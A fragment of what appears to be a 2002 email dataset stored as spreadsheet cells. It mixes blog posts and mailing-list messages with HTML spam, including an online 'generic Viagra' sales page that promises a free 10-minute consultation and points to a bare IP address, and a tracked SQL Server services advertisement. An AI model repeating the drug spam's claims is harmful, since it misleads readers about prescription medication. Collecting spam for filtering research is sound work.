 																	&lt;/tr&gt;
 																&lt;/table&gt;
 															&lt;/td&gt;
 														&lt;/tr&gt;
 														&lt;tr&gt;
 															&lt;td colspan="2"&gt;&lt;br&gt;
 																&lt;table border="0" cellpadding="1" cellspacing="0"&gt;
 																	&lt;tr&gt;
 																		&lt;td&gt;
 																			&lt;table border="0" cellpadding="2" cellspacing="1" width="522" bgcolor="silver"&gt;
 																				&lt;tr&gt;
 																					&lt;td width="122" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Product:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;
 																						&lt;div align="center"&gt;
 																							&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;GSC-100&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 																							&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;u&gt;100mg&lt;/u&gt; Sildenafil Citrate&lt;br&gt;
 																								&lt;br&gt;
 																							&lt;/font&gt;&lt;/div&gt;
 																					&lt;/td&gt;
 																					&lt;td width="30" bgcolor="white"&gt;
 																						&lt;div align="center"&gt;
 																							&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Vs.&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
 																					&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;
 																						&lt;div align="center"&gt;
 																							&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Viagra&amp;reg;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 																							&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;u&gt;100mg&lt;/u&gt; Sildenafil Citrate&lt;br&gt;
 																								&lt;br&gt;
 																							&lt;/font&gt;&lt;/div&gt;
 																					&lt;/td&gt;
 																				&lt;/tr&gt;
 																				&lt;tr&gt;
 																					&lt;td width="122" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Cost:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																					&lt;td bgcolor="white" width="180"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;As low as &lt;b&gt;$5.00&lt;/b&gt; US per 100mg tablet&lt;br&gt;
 																						&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="30" bgcolor="white"&gt;&lt;br&gt;
 																						&lt;br&gt;
 																					&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;$12.25&lt;/b&gt; US per 100mg tablet&lt;/font&gt;&lt;/td&gt;
 																				&lt;/tr&gt;
 																				&lt;tr&gt;
 																					&lt;td width="122" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Physician Consultation:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;
 																						&lt;div align="left"&gt;
 																							&lt;font size="4" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;FREE!&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
 																					&lt;/td&gt;
 																					&lt;td width="30" bgcolor="white"&gt;&lt;br&gt;
 																						&lt;br&gt;
 																						&lt;br&gt;
 																					&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;$75.00 - $100.00&lt;/b&gt; doctors visit&lt;/font&gt;&lt;/td&gt;
 																				&lt;/tr&gt;
 																				&lt;tr&gt;
 																					&lt;td width="122" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Convenience:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;10 minute&lt;/b&gt; online consultation right now&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="30" bgcolor="white"&gt;&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Up to 4 hours&lt;/b&gt;&lt;br&gt;
 																						&lt;/font&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;Doctor visit: 1-3 hours&lt;br&gt;
 																						&lt;/font&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;Pharmacy pickup: &amp;frac12; - 1 hour&lt;br&gt;
 																						&lt;/font&gt;&lt;/td&gt;
 																				&lt;/tr&gt;
 																				&lt;tr&gt;
 																					&lt;td width="122" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;100% Money Back Guarantee:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;YES&lt;/b&gt;, the first drug ever to be guaranteed&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="30" bgcolor="white"&gt;&lt;br&gt;
 																						&lt;br&gt;
 																						&lt;br&gt;
 																					&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;NO&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																				&lt;/tr&gt;
 																				&lt;tr&gt;
 																					&lt;td width="122" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Delivery:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;1-2 days after payment verification - &lt;b&gt;FREE&amp;nbsp;SHIPPING&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 																					&lt;td width="30" bgcolor="white"&gt;&lt;br&gt;
 																						&lt;br&gt;
 																					&lt;/td&gt;
 																					&lt;td width="180" bgcolor="white"&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;When can your doctor see you?&lt;/font&gt;&lt;/td&gt;
 																				&lt;/tr&gt;
 																			&lt;/table&gt;
 																		&lt;/td&gt;
 																	&lt;/tr&gt;
 																&lt;/table&gt;
 																&lt;br&gt;
 															&lt;/td&gt;
 														&lt;/tr&gt;
 														&lt;tr&gt;
 															&lt;td colspan="2"&gt;
 																&lt;div align="center"&gt;
 																	&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;b&gt;
                                                                     &lt;a href="http://203.95.1.164/generic_viagra005/"&gt;
                                                                     Visit our 
                                                                     site&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 																	&lt;/font&gt;&lt;br&gt;
 																	&lt;font size="2" color="FF0000" face="Verdana, Arial, Helvetica, sans-serif"&gt;
                                                                     &lt;a href="http://203.95.1.164/generic_viagra005/"&gt;&lt;b&gt;Limited Time Offer: 15 pills for $119.00&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;a href="http://203.95.1.164/generic_viagra005/"&gt;
                                                                     &lt;/a&gt;
 																	&lt;p&gt;&lt;font size="2" color="848383" face="Verdana, Arial, Helvetica, sans-serif"&gt;Why pay twice as much when GSC-100 is &lt;br&gt;
 																			the same thing and is only a click away?&lt;br&gt;
 																		&lt;/font&gt;&lt;br&gt;
 																		&lt;/p&gt;
 																&lt;/div&gt;
 																&lt;font face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
 														&lt;/tr&gt;
 													&lt;/table&gt;
 												&lt;/td&gt;
 												&lt;td valign="top"&gt;&lt;/td&gt;
 											&lt;/tr&gt;
 										&lt;/table&gt;
 									&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="black" valign="top"&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td bgcolor="#fba501" valign="top"&gt;
 									&lt;div align="center"&gt;
 										&lt;br&gt;
 										&lt;font face="Verdana" size="2" color="white"&gt;Copyright &amp;copy; 2002 Generic Viagra. All rights reserved.&lt;/font&gt;&lt;br&gt;
 										&lt;br&gt;
 										&lt;font face="Verdana" size="2" color="white"&gt;&lt;b&gt;
                                         &lt;a href="http://203.95.1.164/generic_viagra005/"&gt;100% Money Back Guarantee - The First Pharmaceutical to ever be guaranteed&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 											&lt;font size="1"&gt;&lt;br&gt;Viagra&amp;reg; is a trademark of the Pfizer, Inc. and is not affiliated with Generic Viagra.&lt;br&gt;
 												&lt;br&gt;
 											&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/div&gt;
 	&lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Colophon 2
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/01.html#colophon_2
 Date: 2002-10-01T00:22:28-05:00
 _Heather Hamilton_: About[1]. &amp;#8220;I am that girl.&amp;#8221;
 [1] http://www.dooce.com/about.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Trip Notes
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000647
 Date: 2002-10-08T16:39:48-06:00
 === Scissors === 
 I, like most other people here, went through the security checkpoint. Unlike 
 everyone else, they decided to search my suitcase. The security lady asked for 
 permission and then took everything out: clothing, umbrellas, a jacket, and a 
 box of crackers. She searched all the pockets: nothing. Apparently the jacket 
 was suspicious; She sent it through again. Nothing. 
     The lady in the next lane waved a 10-inch knife and asked the lady in my 
     lane if it could go on. I can only assume she answered yes. 
 She put everything back in and sent it through again. Still suspicious. They 
 took everything out. It looked like this was going to take a while, so I used 
 the opportunity to put the tickets I was holding back in my bag. When I looked 
 back up, the security woman was brandishing a scissors and saying "This can't 
 go on board." "I don't remember packing that," I said. I let her confiscate it. 
 I called my Mom. She doesn't remember packing it either. Is there some sort of 
 terrorist plot to plant scissors in innocent-looking people's suitcases? I 
 can't see why this would be useful. How would they know what plane I'm on? Once 
 I'm on the plane how would they get the scissors? They could threaten me, but 
 if they have a threatening implement already, then why do they need the 
 scissors? Perhaps it's some sort of Matroishca-doll system. They use their 
 fists to get the infant to give them the squeaky mouse, they use the squeaky 
 mouse to scare the toddler into giving them a copy of _A New Kind of Science_, 
 they use ANKS to bludgeon a 5th Grader into giving them a wedge block, and they 
 use the wedge to get me to give them the scissors. Those are some pretty clever 
 terrorists. 
 *Update:* False alarm. My Mom called. Apparently it was the scissors she was 
 using to cut loose threads from my tie last night. It must have fallen in. The 
 nation can go back to Yellow Level Terrorist Alert.  
 === Waiting for Wireless === 
 Now I am at O'Hare Airport, sitting outside the Admiral's Club while 
 businessmen walk in and out. I am looking for a wireless signal, the signal I 
 used last time I was here, but not finding it. Of course, last time I was here, 
 I had an Admiral's Club card. This time I have a Mileage Plus Card, but despite 
 the airline ologopoly--or perhaps because of it (have to keep up appearances, 
 you know)--I doubt they will accept it. 
 === Irony === 
 According to the announcement I just heard, Mr. Valenti is going to miss his 
 flight. 
 I think of what I'd say if I ran into him. "Jack!" I'd exclaim, as if we were 
 old pals. "Going to the Eldred case?" Of course he was. "Going to be a good 
 one." "Hey, remember when you had that debate with Lessig?" I'd ask. "You said 
 you were starting a new task force to make movies legitimately available on the 
 Internet. What ever happened to that?" I imagine him mumbling and looking down 
 at his watch. His plane is going to leave soon; he has to run. 
 Another announcement: Mr. Michael McKenna needs to call his office. Good thing 
 these airline announcements keep me up to date. 
 === Automatic Flush Toilets === 
 Now I am short and the sensing system was mounted up tall in both instances. In 
 the first, at my old high school (where you think some people might be a little 
 short...), the flush went off once accidentally. OK, I thought, I can handle 
 one mistake. Then it went off again. Here at the airport, it misfired three 
 times. 
 This is annoying and inexcusable. Have they not heard of user testing? Do they 
 expect only tall people to use these bathrooms? This problem must be remedied 
 immediately. I recommend releasing a Service Pack on the manufacturer's web 
 site. 
 === Arrival === 
 I've arrived in D.C.--once again, I'm sitting a block away from my hotel on the 
 sidewalk borrowing someone's connection. Trip was very smooth, had lunch with 
 Lisa and went to the Spy Museum (pretty cool, but could have been better). Now 
 for the meetings and parties. 
 Sorry for not responding to your email. I'm rather busy. ;-)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002, Gordon Mohr wrote:
 &gt; If you crypto-sign your outgoing mail, you don't have to set your
 &gt; mailwall whitelist to accept unsigned mail spoofed as being from you.
 Users don't like entering passphrases when sending email. USB fobs, smart 
 cards or other removable hardware are not yet widespread.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Leave it to Tom to put the one w/ his son's wanker in the center. LOL  
 Reminds me of when my sister called me about the birth of her first son.  
 She goes: "Cindy, he looks just like his dad, but he's HUNG!"  LOL ehehe  
 Grats, Tom, he's gorgeous.  Good thing he doesn't look like you.  (:
 Cindy
 On Thu, 1 Aug 2002, Tom wrote:
 &gt; 
 &gt; I gota thank all you kind folk who sent thier well wishes our way. It was
 &gt; a bumpy ride but everything is working out and allthe good vibes are a
 &gt; tremendous help. Ive saved each one and along with the cards and other
 &gt; emails we have been getting we are goign to print them out add them to
 &gt; Benjamins baby book.
 &gt; 
 &gt; Ive had just enough time to Gimp up a pic so folks can see the little
 &gt; bloke. Head on over to http://wsmf.blogspot.com/ and have a gander at the
 &gt; boy.
 &gt; 
 &gt; -tom(i cant feedem so I changem)whore
 &gt; 
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 -- 
 "My theology, briefly, is that the universe was dictated but not
           signed."  (Christopher Morley) 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Bug?
</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone else experience this:
 http://sf.net/tracker/index.php?func=detail&amp;aid=600311&amp;group_id=3978&amp;atid=10
 3978
 Also, it seems that the bugs tracker on SF isn't used very much ... is there
 somewhere else to post bugs?
 - Colin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</si>
  <si>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First, it was my understanding that they had the food before they
 refused to pay.  I often have the goods in my possession before I settle
 the paycheck.
 Second, 'not being paid for a little food' is an awfully big deal in
 India.  It isn't far from stealing the only food my children have so
 I'll have to watch them starve.  The margin of survival is very, very,
 thin.
 So yes.  In my particular reality distortion field 'not paying for a
 little food' in India is akin to a direct act of violence intended to
 cause suffering if not death on the victims family.  That such an act
 triggers a violent response is, IMHO, hardly surprising.
 In other words, as far as I could tell the people on the train fired the
 first shot.
 With all of that said I still don't know if this happened or not.  Nor
 do I know for sure that the margin of survival for those Muslim vendors
 was that thin.
 &gt; -----Original Message-----
 &gt; From: Stephen D. Williams [mailto:swilliams@hpti.com]
 &gt; Sent: Monday, September 16, 2002 11:54 AM
 &gt; To: johnhall@evergo.net
 &gt; Cc: fork@example.com; lea@lig.net
 &gt; Subject: Re: Slaughter in the Name of God
 &gt; 
 &gt; Wow!  It seems you are evaluating this with a large reality distortion
 &gt; field.
 &gt; 
 &gt; If the activists on the train refused to pay for food, then the
 vendors
 &gt; shouldn't give it to them.  And the local police force should be
 &gt; arresting them.  Etc.
 &gt; 
 &gt; You have to be operating from a particularly primitive point of view,
 &gt; which obviously was in operation with the participants here, to think
 &gt; that religious differences or not being paid for a little food (or
 &gt; taunting!) was even a remote justification for burning a train full of
 &gt; people alive.
 &gt; 
 &gt; sdw
 &gt; 
 &gt; John Hall wrote:
 &gt; &gt; What I understood was that the activists on the train refused to pay
 for
 &gt; &gt; the food and other items they acquired from the Muslim vendors --
 then
 &gt; &gt; taunted them.
 &gt; &gt;
 &gt; &gt; That may not be true, but it would put things in a more interesting
 &gt; &gt; light.  Taking food from a small vendor in India and not paying them
 is
 &gt; &gt; trying to starve them.
 &gt; &gt;
 &gt; &gt; It sounded consistent with the ideas and purpose of the train full
 of
 &gt; &gt; activists.
 &gt; &gt;
 &gt; &gt; I'm rarely an apologist for Muslims anywhere.  Yet I find my
 sympathies
 &gt; &gt; with the Muslims in this case, even after they burned the train.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;&gt;From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; &gt;&gt;Stephen D. Williams
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;&gt;The pity of it is that some
 &gt; &gt;&gt;Muslims were ready to give it to them. Their murderous attack on the
 &gt; &gt;&gt;train-load of VHP activists at Godhra (with its awful, atavistic
 &gt; &gt;
 &gt; &gt; echoes
 &gt; &gt;
 &gt; &gt;&gt;of the killings of Hindus and Muslims by the train-load during the
 &gt; &gt;&gt;partition riots of 1947) played right into the Hindu extremists'
 &gt; &gt;
 &gt; &gt; hands.
 &gt; 
 &gt; sdw
 &gt; --
 &gt; swilliams@hpti.com http://www.hpti.com
 &gt; Stephen D. Williams, Senior Technical Director
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hassle-Free Microsoft SQL Server Remote Database Administration
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML xmlns="http://www.sqlcare.com/TR/REC-html40" xmlns:v = 
 "urn:schemas-microsoft-com:vml" xmlns:o = 
 "urn:schemas-microsoft-com:office:office" xmlns:w = 
 "urn:schemas-microsoft-com:office:word"&gt;&lt;HEAD&gt;&lt;TITLE&gt;Message&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content=FrontPage.Editor.Document name=ProgId&gt;
 &lt;META content="Microsoft FrontPage 4.0" name=GENERATOR&gt;
 &lt;META content="Microsoft Word 10" name=Originator&gt;&lt;LINK 
 href="../Hassle-Free%20Microsoft%20SQL%20Server%20Remote%20Database%
 20Administration_files/filelist.xml" 
 rel=File-List&gt;&lt;LINK 
 href="../Hassle-Free%20Microsoft%20SQL%20Server%20Remote%20Database%
 20Administration_files/editdata.mso" 
 rel=Edit-Time-Data&gt;&lt;!--[if !mso]&gt;
 &lt;STYLE&gt;
 v\:* {behavior:url(#default#VML);}
 o\:* {behavior:url(#default#VML);}
 w\:* {behavior:url(#default#VML);}
 .shape {behavior:url(#default#VML);}
 &lt;/STYLE&gt;
 &lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:OfficeDocumentSettings&gt;
   &lt;o:DoNotRelyOnCSS/&gt;
  &lt;/o:OfficeDocumentSettings&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;w:WordDocument&gt;
   &lt;w:SpellingState&gt;Clean&lt;/w:SpellingState&gt;
   &lt;w:GrammarState&gt;Clean&lt;/w:GrammarState&gt;
   &lt;w:DocumentKind&gt;DocumentEmail&lt;/w:DocumentKind&gt;
   &lt;w:EnvelopeVis/&gt;
   &lt;w:BrowserLevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;
  &lt;/w:WordDocument&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;
 &lt;STYLE&gt;
 &lt;!--
  /* Style Definitions */
  p.MsoNormal, li.MsoNormal, div.MsoNormal
 	{mso-style-parent:"";
 	margin:0in;
 	margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	font-size:12.0pt;
 	font-family:"Times New Roman";
 	mso-fareast-font-family:"Times New Roman";}
 a:link, span.MsoHyperlink
 	{color:blue;
 	text-decoration:underline;
 	text-underline:single;}
 a:visited, span.MsoHyperlinkFollowed
 	{color:blue;
 	text-decoration:underline;
 	text-underline:single;}
 p.MsoAutoSig, li.MsoAutoSig, div.MsoAutoSig
 	{margin:0in;
 	margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	font-size:12.0pt;
 	font-family:"Times New Roman";
 	mso-fareast-font-family:"Times New Roman";}
 p
 	{mso-margin-top-alt:auto;
 	margin-right:0in;
 	mso-margin-bottom-alt:auto;
 	margin-left:0in;
 	mso-pagination:widow-orphan;
 	font-size:12.0pt;
 	font-family:"Times New Roman";
 	mso-fareast-font-family:"Times New Roman";}
 span.EmailStyle19
 	{mso-style-type:personal;
 	mso-style-noshow:yes;
 	mso-ansi-font-size:10.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Arial;
 	mso-ascii-font-family:Arial;
 	mso-hansi-font-family:Arial;
 	mso-bidi-font-family:Arial;
 	color:navy;}
 span.EmailStyle20
 	{mso-style-type:personal;
 	mso-style-noshow:yes;
 	mso-ansi-font-size:10.0pt;
 	mso-bidi-font-size:10.0pt;
 	font-family:Arial;
 	mso-ascii-font-family:Arial;
 	mso-hansi-font-family:Arial;
 	mso-bidi-font-family:Arial;
 	color:navy;}
 @page Section1
 	{size:8.5in 11.0in;
 	margin:1.0in 1.25in 1.0in 1.25in;
 	mso-header-margin:.5in;
 	mso-footer-margin:.5in;
 	mso-paper-source:0;}
 div.Section1
 	{page:Section1;}
 --&gt;
 &lt;/STYLE&gt;
 &lt;!--[if gte mso 10]&gt;
 &lt;style&gt;
  /* Style Definitions */
  table.MsoNormalTable
 	{mso-style-name:"Table Normal";
 	mso-tstyle-rowband-size:0;
 	mso-tstyle-colband-size:0;
 	mso-style-noshow:yes;
 	mso-style-parent:"";
 	mso-padding-alt:0in 5.4pt 0in 5.4pt;
 	mso-para-margin:0in;
 	mso-para-margin-bottom:.0001pt;
 	mso-pagination:widow-orphan;
 	font-size:10.0pt;
 	font-family:"Times New Roman";}
 &lt;/style&gt;
 &lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:shapedefaults v:ext="edit" spidmax="2050"/&gt;
 &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
  &lt;o:shapelayout v:ext="edit"&gt;
   &lt;o:idmap v:ext="edit" data="1"/&gt;
  &lt;/o:shapelayout&gt;&lt;/xml&gt;&lt;![endif]--&gt;&lt;/HEAD&gt;
 &lt;BODY lang=EN-US style="tab-interval: .5in" vLink=blue link=blue 
 bgColor=white&gt;
 &lt;DIV class=Section1&gt;
 &lt;DIV&gt;
 &lt;TABLE class=MsoNormalTable 
 style="MARGIN-LEFT: 1in; WIDTH: 438pt; mso-cellspacing: 0in; mso-padding-alt: 0in 0in 
 0in 0in" 
 cellSpacing=0 cellPadding=0 width=584 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR style="mso-yfti-irow: 0; mso-yfti-lastrow: yes"&gt;
     &lt;TD 
     style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; 
 PADDING-TOP: 0in" 
     vAlign=top&gt;
       &lt;P class=MsoNormal&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN 
       style="FONT-SIZE: 12pt"&gt;&lt;IMG id=_x0000_i1025 height=96 
       src="http://www.sqlcare.com/images/sql_01.gif" width=144 border=0 
       NOSEND="1"&gt;&lt;BR&gt;&lt;A 
       href="http://www.sqlcare.com/pixel/click.php?ref=324
 &amp;amp;go=http://www.sqlcare.com/"&gt;&lt;SPAN 
       style="TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG id=_x0000_i1026 
       height=27 src="http://www.sqlcare.com/images/sql_02.gif" width=144 
       border=0 NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;BR&gt;&lt;A 
       href="http://www.sqlcare.com/pixel/click.php?ref=324
 &amp;amp;go=http://www.sqlcare.com/complete.htm"&gt;&lt;SPAN 
       style="TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG id=_x0000_i1027 
       height=26 src="http://www.sqlcare.com/images/sql_03.gif" width=144 
       border=0 NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;BR&gt;&lt;A 
       href="http://www.sqlcare.com/pixel/click.php?ref=324
 &amp;amp;go=http://www.sqlcare.com/profile.htm"&gt;&lt;SPAN 
       style="TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG id=_x0000_i1028 
       height=35 src="http://www.sqlcare.com/images/sql_04.gif" width=144 
       border=0 NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;BR&gt;&lt;A 
       href="http://www.sqlcare.com/pixel/click.php?ref=324
 &amp;amp;go=http://www.sqlcare.com/services.htm"&gt;&lt;SPAN 
       style="TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG id=_x0000_i1029 
       height=39 src="http://www.sqlcare.com/images/sql_05.gif" width=144 
       border=0 NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;BR&gt;&lt;A 
       href="http://www.sqlcare.com/pixel/click.php?ref=324
 &amp;amp;go=http://www.sqlcare.com/faqs.htm"&gt;&lt;SPAN 
       style="TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG id=_x0000_i1030 
       height=36 src="http://www.sqlcare.com/images/sql_06.gif" width=144 
       border=0 NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;BR&gt;&lt;A 
       href="http://www.sqlcare.com/pixel/click.php?ref=324
 &amp;amp;go=http://www.sqlcare.com/contact.htm"&gt;&lt;SPAN 
       style="TEXT-DECORATION: none; text-underline: none"&gt;&lt;IMG id=_x0000_i1031 
       height=30 src="http://www.sqlcare.com/images/sql_07.gif" width=144 
       border=0 NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG id=_x0000_i1032 height=114 
       src="http://www.sqlcare.com/images/sql_08.gif" width=144 border=0 
       NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD 
     style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; 
 PADDING-TOP: 0in" 
     vAlign=top&gt;
       &lt;P&gt;&lt;FONT face="Times New Roman" size=3&gt;&lt;SPAN style="FONT-SIZE: 12pt"&gt;
 &lt;IMG 
       id=_x0000_i1033 height=96 src="http://www.sqlcare.com/images/sql_09.gif" 
       width=440 border=0 NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;DIV align=center&gt;
       &lt;TABLE class=MsoNormalTable 
       style="WIDTH: 90%; mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in 0in" 
       cellSpacing=0 cellPadding=0 width="90%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR style="mso-yfti-irow: 0; mso-yfti-lastrow: yes"&gt;
           &lt;TD 
           style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; 
 PADDING-TOP: 0in"&gt;
             &lt;P&gt;&lt;FONT face=Arial color=#000066 size=3&gt;&lt;SPAN 
             style="FONT-SIZE: 12pt; COLOR: #000066; FONT-FAMILY: Arial"&gt;&lt;IMG 
             id=_x0000_i1034 height=105 
             src="http://www.sqlcare.com/images/sql_10.jpg" width=440 border=0 
             NOSEND="1"&gt;&lt;BR&gt;&lt;BR&gt;&lt;IMG id=_x0000_i1035 height=111 
             src="http://www.sqlcare.com/images/sql_11.jpg" width=440 border=0 
             NOSEND="1"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
             &lt;DIV align=center&gt;
             &lt;TABLE class=MsoNormalTable 
             style="WIDTH: 281.25pt; mso-cellspacing: 0in; mso-padding-alt: 0in 0in 0in 0in" 
             cellSpacing=0 cellPadding=0 width=375 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR style="mso-yfti-irow: 0; mso-yfti-lastrow: yes"&gt;
                 &lt;TD 
                 style="PADDING-RIGHT: 0in; PADDING-LEFT: 0in; PADDING-BOTTOM: 0in; 
 PADDING-TOP: 0in"&gt;
                   &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;B&gt;&lt;FONT face=Arial 
                   size=3&gt;&lt;SPAN 
                   style="FONT-WEIGHT: bold; FONT-SIZE: 12pt; FONT-FAMILY: Arial"&gt;&lt;A 
                   href="http://www.sqlcare.com/pixel/click.php?ref=324
 &amp;amp;go=http://www.sqlcare.com"&gt;&lt;FONT 
                   color=#5555ff size=5&gt;&lt;SPAN 
                   style="FONT-SIZE: 18pt; COLOR: #5555ff"&gt;visit us at 
                   www.sqlcare.com&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT 
                   face=Arial size=5&gt;&lt;SPAN 
                   style="FONT-WEIGHT: bold; FONT-SIZE: 18pt; FONT-FAMILY: Arial"&gt;&lt;BR&gt;or 
                   call us at (214) 740.0923&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/B&gt; &lt;/P&gt;
